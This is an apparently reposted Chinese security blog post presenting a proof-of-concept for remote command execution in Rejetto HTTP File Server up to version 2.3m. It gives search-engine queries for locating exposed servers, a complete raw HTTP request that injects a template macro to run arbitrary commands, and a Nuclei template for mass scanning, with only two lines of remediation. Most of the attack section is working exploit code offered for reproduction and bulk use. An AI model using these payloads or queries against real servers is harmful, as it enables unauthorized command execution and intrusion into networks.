Rejetto HTTP File Server 远程命令执行漏洞 POC

admin 2024年7月3日14:38:00评论11 views字数 2012阅读6分42秒阅读模式
0x01 免责声明
disclaimer

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。信息及工具收集于互联网,真实性及安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 漏洞介绍
Vulnerability introduction
    Rejetto HTTP File Server 存在模板注入漏洞,攻击者可以通过漏洞执行任意命令从而获取服务器权限,可能导致内网进一步被攻击。

影响版本:Rejetto HTTP File Server <= 2.3m

0x03 搜索语法
Search for syntax
  • Fofa:
body="HttpFileServer"
  • Hunter
web.body="HttpFileServer"
  • Quake
body="HttpFileServer"

Rejetto HTTP File Server 远程命令执行漏洞 POC

0x04 漏洞复现
Request packets
  • 请求接口执行ipconfig
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: your-ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Rejetto HTTP File Server 远程命令执行漏洞 POC
0x05 nuclei POC
nuclei POC
  • Nuclei 批量检测POC
  • 所用方法nuclei.exe -l 网址文件.txt -t POC.yaml
id: Rejetto_HTTP_File_Server_RCE

info:
  name: Rejetto_HTTP_File_Server_RCE
  author: security-xm
  severity: high
  description: Rejetto HTTP File Server 存在模板注入漏洞
  metadata:
    max-request: 1
    shodan-query: ""
    verified: true

http:
- raw:
  - |+
    @timeout: 30s
    GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
    Host: {{Hostname}}
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9

  max-redirects: 3
  matchers-condition: and
  matchers:
  - id: 1
    type: word
    part: body
    words:
    - Configuration
    condition: and
Rejetto HTTP File Server 远程命令执行漏洞 POC
0x07 修复建议
Remediation recommendations
  • 在Web应用防火墙中添加接口临时黑名单规则
  • 联系厂商打补丁或升级版本。

Rejetto HTTP File Server 远程命令执行漏洞 POC

原文始发于微信公众号(小明信安):【漏洞复现 | 含批量POC】Rejetto HTTP File Server 远程命令执行 漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日14:38:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Rejetto HTTP File Server 远程命令执行漏洞 POChttps://cn-sec.com/archives/2844107.html

发表评论

匿名网友 填写信息